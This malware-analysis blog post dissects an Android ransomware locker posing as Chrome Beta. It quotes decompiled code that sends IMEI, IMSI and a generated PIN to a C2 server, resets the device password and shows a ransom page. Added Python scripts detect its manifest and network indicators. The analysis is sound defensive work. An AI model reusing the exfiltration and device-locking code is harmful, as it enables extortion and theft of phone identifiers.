Sunday, 17 May 2020

Android Locker targeting Russian Users

On 15 May 2020, a malicious Android application was found hosted at the following URL: hxxp://94.140.115.85/googleplay/install/install.apk

This application has the capability to register itself as a device administrator and use that privilege to reset the password of the Android phone. Once the phone is locked, the application demands a ransom from the user to unlock it.

In this blog, I will describe the functionality of this Android locker.

MD5 hash of the APK file: a67480f99005d99cdff2dc1e2002536c
Filename: install.apk
URL: hxxp://94.140.115.85/googleplay/install/install.apk
Package name: com.chrome.beta

From the AndroidManifest.xml we can see that four receivers are present in this application:

Listen - handles the DEVICE_ADMIN_ENABLED intent
TryDisable - handles the trydisable intent
Work - handles the spwd intent
Boot - handles the BOOT_COMPLETED intent
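The receiver layout above is itself a useful triage signal: a receiver bound to DEVICE_ADMIN_ENABLED, a BOOT_COMPLETED receiver for persistence, and app-private broadcast names used to chain them. The following Python script is an added example, not code from the original post or from the sample: it parses a manifest and flags that combination. The manifest text is constructed to match the four receivers, their actions and the package name given above; the BIND_DEVICE_ADMIN permission, the device_admin meta-data and the remaining attributes are assumptions about how such a sample would declare them, and the small table of well-known package names is constructed for the example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS  # ElementTree attribute prefix for android:* attributes

# Constructed manifest: receiver names, actions and the package name come from the post;
# the remaining attributes are assumptions about how such a sample would declare them.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.chrome.beta">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Chrome Beta">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".WebActivity"/>
    <receiver android:name=".Listen" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <meta-data android:name="android.app.device_admin" android:resource="@xml/policies"/>
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".TryDisable">
      <intent-filter><action android:name="trydisable"/></intent-filter>
    </receiver>
    <receiver android:name=".Work">
      <intent-filter><action android:name="spwd"/></intent-filter>
    </receiver>
    <receiver android:name=".Boot">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>
"""


def qualified(name, package):
    """Expand the shorthand ".Listen" form to "com.chrome.beta.Listen"."""
    return package + name if name.startswith(".") else name


def receivers_with_actions(manifest_xml):
    """Return {receiver class: [intent actions it registers for]}."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    receivers = {}
    for recv in root.iter("receiver"):
        name = qualified(recv.get(A + "name"), package)
        receivers[name] = [act.get(A + "name") for act in recv.iter("action")]
    return receivers


def triage(manifest_xml):
    """Flag the indicators the post describes: a device-admin receiver, a boot receiver for
    persistence, and custom broadcast actions used to chain receivers (Listen -> Work)."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    receivers = receivers_with_actions(manifest_xml)
    findings = []
    for name, actions in receivers.items():
        if "android.app.action.DEVICE_ADMIN_ENABLED" in actions:
            findings.append(("device_admin_receiver", name))
        if "android.intent.action.BOOT_COMPLETED" in actions:
            findings.append(("boot_persistence", name))
    # Actions without a dotted namespace are app-private broadcasts, not platform intents.
    custom = sorted(a for acts in receivers.values() for a in acts if a and "." not in a)
    if custom:
        findings.append(("custom_broadcast_actions", ",".join(custom)))
    # A device-admin APK served from a bare IP address but carrying the package name of a
    # well-known app deserves a separate note (constructed table of known names).
    well_known = {"com.chrome.beta": "Chrome Beta"}
    if package in well_known:
        findings.append(("well_known_package_name", package))
    return findings


if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_MANIFEST):
        print(kind, detail)
```

The same functions work on a manifest decoded from a real APK (for example the output of apktool or aapt), since they only rely on the android: namespace and the standard receiver, intent-filter and action elements.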

The MainActivity class is shown below.


In MainActivity, the application fetches the IMEI and IMSI values from the phone using the "phone" system service (TelephonyManager), as shown below.

    // TelephonyManager obtained through the "phone" system service
    Object localObject = (TelephonyManager)getSystemService("phone");
    paramBundle = ((TelephonyManager)localObject).getSubscriberId(); // IMSI
    String str = ((TelephonyManager)localObject).getDeviceId();      // IMEI

This data is sent to the C&C server in an HTTP GET request as shown below.

    new Request().execute(new String[] { "http://95.217.223.24/chceimw.php?imei=" + str + "&imsi=" + paramBundle + "&action=1" });

    GET /chceimw.php?imei=000000000000000&imsi=XXXXX0000000000&action=1 HTTP/1.1
    Host: 95.217.223.24
    Connection: close
    User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Adding a new device administrator

The code section below requests that the application be added as a new device administrator:

    // The Listen receiver is the DeviceAdminReceiver being registered
    localObject = new ComponentName(this, Listen.class);
    Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    localIntent.putExtra("android.app.extra.DEVICE_ADMIN", (Parcelable)localObject);
    // Explanation text shown in the system prompt (string resource id)
    localIntent.putExtra("android.app.extra.ADD_EXPLANATION", getString(2131034113));

Below is the message displayed on the phone when the user is asked to install a new Device Administrator.


The policy for the new device admin is set to the Listen class.

Once the device admin is added, the onEnabled() method in the Device admin class will be called as shown below.



The onEnabled() method broadcasts an intent with the name "spwd", which is handled by the Work class (this receiver is defined in the AndroidManifest.xml file).

    paramContext.sendBroadcast(new Intent("spwd"));

Resetting Password and Locking the Phone

Let's look at the Work class which handles the intent with the name: "spwd".


It performs the following operations.

1. Fetches the IMSI and IMEI values using the getSubscriberId() and getDeviceId() methods of the phone system service.

2. Generates a new random password as shown below:

    // nextInt(888868) yields 0..888867, so the password is always a 6-digit number in 111112..999979
    String str = String.valueOf(new Random().nextInt(888868) + 111112);

3. Uses the "device_policy" system service (DevicePolicyManager) to reset the password and lock the phone as shown below.

    // flag 1 = RESET_PASSWORD_REQUIRE_ENTRY: the new password must be entered before the device can be used
    localDevicePolicyManager.resetPassword(str, 1);
    localDevicePolicyManager.lockNow();

4. Sends an HTTP GET request with the IMSI, IMEI and randomly generated password as shown below:

    new Request().execute(new String[] { "http://95.217.223.24/chceimw.php?imei=" + (String)localObject + "&imsi=" + paramIntent + "&data=" + str });

5. Once the password is successfully set, the onPasswordSucceeded() method in the Listen class will be called as shown below.

    // Start WebActivity from the receiver; 268435456 = 0x10000000 = FLAG_ACTIVITY_NEW_TASK,
    // required when starting an activity from a non-activity context
    paramIntent = new Intent(paramContext, WebActivity.class);
    paramIntent.addFlags(268435456);
    try
    {
      paramContext.startActivity(paramIntent);
    }
    catch (Exception localException) {} // catch clause not shown in the decompiled excerpt; assumed

This method will start the activity called WebActivity.
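The check-in request (action=1) and the password upload (data=...) share one endpoint, so a single rule catches both. The following Python script is an added example, not code from the original post or from the sample: it classifies proxy-style log lines against the indicators in this post and checks whether a data value fits the 6-digit range the generator in step 2 can produce (111112 to 999979). The hosts, the chceimw.php path, the parameter names and the payment-ban- path prefix come from the post; the "METHOD URL" log format and the log lines themselves are constructed.

```python
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the post.
C2_HOSTS = {"95.217.223.24", "94.140.115.85"}
C2_PATH = "/chceimw.php"
RANSOM_PATH_PREFIX = "/payment-ban-"

# Password space implied by new Random().nextInt(888868) + 111112 in the Work receiver.
PASSWORD_MIN = 111112
PASSWORD_MAX = 111112 + 888868 - 1  # 999979

# Constructed proxy-style log: "METHOD URL" per line.
SAMPLE_LOG = [
    "GET http://95.217.223.24/chceimw.php?imei=000000000000000&imsi=XXXXX0000000000&action=1",
    "GET http://95.217.223.24/chceimw.php?imei=000000000000000&imsi=XXXXX0000000000&data=532187",
    "GET http://95.217.223.24/chceimw.php?imei=000000000000000&imsi=XXXXX0000000000&data=100000",
    "GET http://95.217.223.24/payment-ban-2985910/",
    "GET http://example.com/index.html",
]


def password_matches_generator(value):
    """True if value is a 6-digit string inside the range the locker's generator can produce."""
    return value.isdigit() and len(value) == 6 and PASSWORD_MIN <= int(value) <= PASSWORD_MAX


def classify_request(line):
    """Classify one 'METHOD URL' line; returns (kind, detail) or None for unrelated traffic."""
    parts = line.split()
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    if url.hostname not in C2_HOSTS:
        return None
    if url.path == C2_PATH:
        q = parse_qs(url.query)
        if "imei" not in q or "imsi" not in q:
            return None
        if q.get("action") == ["1"]:
            return ("checkin", q["imei"][0])
        data = q.get("data", [""])[0]
        if password_matches_generator(data):
            return ("password_exfil", data)
        # Same endpoint but a value the generator cannot produce: still C2 contact, flagged separately
        return ("c2_other", url.query)
    if url.path.startswith(RANSOM_PATH_PREFIX):
        return ("ransom_page", url.path)
    return ("c2_host_contact", url.path)


def scan(lines):
    """Run classify_request over a log and keep only the hits."""
    return [hit for hit in (classify_request(line) for line in lines) if hit]


if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_LOG):
        print(kind, detail)
```

For incident response the data value in a password_exfil hit is the PIN that was set on the victim's device, which is why recovering these requests from proxy or gateway logs is worth the effort when a locked phone is brought in.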

The onCreate() method in WebActivity creates a WebView and loads the ransom message from the URL hxxp://95.217.223.24/payment-ban-2985910/ as shown below.

  public void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    // 4719616 = 0x480400 = FLAG_FULLSCREEN | FLAG_SHOW_WHEN_LOCKED | FLAG_DISMISS_KEYGUARD
    getWindow().addFlags(4719616);
    setContentView(2130903040);                         // layout resource id
    this.webView = ((WebView)findViewById(2131099648)); // WebView resource id
    this.webView.loadUrl("http://95.217.223.24/payment-ban-2985910/");
  }

The ransom message displayed on the Android phone is shown below.


The phone will immediately be locked by the ransomware. Once the user tries to unlock the phone with the old PIN, the above ransom message is displayed.

This message asks the user to send 1000 roubles to the payment address 4693 9575 8653 7180.

c0d3inj3cT